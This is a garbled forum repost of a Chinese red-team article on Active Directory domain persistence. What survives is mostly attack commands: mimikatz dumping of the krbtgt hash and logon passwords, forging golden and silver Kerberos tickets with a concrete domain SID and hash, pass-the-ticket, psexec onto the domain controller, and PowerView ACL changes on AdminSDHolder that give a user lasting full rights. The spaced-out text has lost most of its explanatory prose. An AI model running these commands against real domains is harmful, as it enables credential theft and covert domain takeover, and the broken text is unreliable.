搜索

[18617] 2021-08-14_内网渗透|域内持久化与Windows日志删除

文档创建者:s7ckTeam
浏览次数:38
最后更新:2025-01-18
2021-08-14_内网渗透|域内持久化与Windows日志删除 W i n d o w s   1 1 c c a a b   H A C K   2 0 2 1 - 0 8 - 1 4 # w i n d o w s   , 2 #   , 2 0 #   , 4 0 x 0 1   使 k r b t g t N T L M   h a s h T G T S I D k r b t g t h a s h A E S - 2 5 6 1 . 1   k r b t g t p r i v i l e g e : : d e b u g l s a d u m p : : l s a   / i n j e c t   / n a m e : k r b t g t
k r b t g t h a s h s i d 1 . 2   使 m i m i k a t z k e r b e r o s c 7 3 c a e d 3 b c 6 f 0 a 2 4 8 e 5 1 d 3 7 b 9 a 8 6 7 5 f a S - 1 - 5 - 2 1 - 1 5 1 8 7 7 2 1 8 - 3 6 6 6 2 6 8 5 1 7 - 4 1 4 5 4 1 5 7 1 2
g o l d . k r i b i g o l d . k r i b i a d m i n i s t r a t o r m i m i k a t z   " k e r b e r o s : : g o l d e n   / d o m a i n : r e d t e a m . l o c a l   / s i d : S - 1 - 5 - 2 1 - 1 5 1 8 7 7 2 1 8 - 3 6 6 6 2 6 8 5 1 7 - 4 1 4 5 4 1 5 7 1 2 / k r b t g t : c 7 3 c a e d 3 b c 6 f 0 a 2 4 8 e 5 1 d 3 7 b 9 a 8 6 7 5 f a   / u s e r : a d m i n i s t r a t o r / t i c k e t : g o l d . k i r b i " k e r b e r o s : : p t t   C : U s e r s j a c k D e s k t o p g o l d . k i r b i
a d m i n i s t r a t o r 0 x 0 2   h a s h T G S T G T 访 K e r b e r o s T G S 访 使 C I F S w i n d o w s 2 . 1   s i d w h o a m i   / u s e r
2 . 2   N T L M   H a s h 2 . 3   p r i v i l e g e : : D e b u g s e k u r l s a : : l o g o n p a s s w o r d s
k e r b e r o s : : g o l d e n   / d o m a i n : r e d t e a m . l o c a l / s i d : S - 1 - 5 - 2 1 - 1 5 1 8 7 7 2 1 8 - 3 6 6 6 2 6 8 5 1 7 - 4 1 4 5 4 1 5 7 1 2 / t a r g e t : D C . r e d t e a m . l o c a l
p s e x e c D C c m d 0 x 0 3   A d m i n S D H o l d e r A d m i n S D H o l d e r A D A D
使   A C L   A d m i n S D H o l d e r   A C L A d m i n i s t r a t o r s D o m a i n   A d m i n s E n t e r p r i s e   A d m i n s A d m i n S D H o l d e r a d a d m i n c o u n t 1 3 . 1   使 使 p o w e r v i e w a d s e r v e r 2 0 0 0 A d m i n i s t r a t o r s D o m a i n A d m i n s A c c o u n t O p e r a t o r s B a c k u p O p e r a t o r s D o m a i n C o n t r o l l e r s E n t e r p r i s e A d m i n s P r i n t O p e r a t o r s R e p l i c a t o r R e a d - o n l y   D o m a i n C o n t r o l l e r s S c h e m a A d m i n s S e r v e r O p e r a t o r s G e t - N e t U s e r - A d m i n C o u n t | s e l e c t   s a m a c c o u n t n a m e
a d 3 . 2   使 使 A c t i v e D i r e c t o r y a d G e t - n e t g r o u p   - A d m i n C o u n t |   s e l e c t   n a m e I m p o r t - M o d u l e A c t i v e D i r e c t o r y G e t - A D O b j e c t - L D A P F i l t e r " ( & ( a d m i n c o u n t = 1 ) ( | ( o b j e c t c a t e g o r y = p e r s o n ) ( o b j e c t c a t e g o r y = g r o u p ) ) ) " | s e l e c t   n a m e
3 . 3   j a c k s i d j a c k A d d - D o m a i n O b j e c t A c l - T a r g e t I d e n t i t y A d m i n S D H o l d e r - P r i n c i p a l I d e n t i t y   j a c k   - R i g h t s A l l G e t - D o m a i n O b j e c t A c l   a d m i n s d h o l d e r   |   ? { $ _ . S e c u r i t y I d e n t i f i e r - m a t c h   " S - 1 - 5 - 2 1 - 1 5 1 8 7 7 2 1 8 - 3 6 6 6 2 6 8 5 1 7 - 4 1 4 5 4 1 5 7 1 2 - 1 1 0 6 " }   |   s e l e c t   o b j e c t d n , A c t i v e D i r e c t o r y R i g h t s   | s o r t   - U n i q u e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理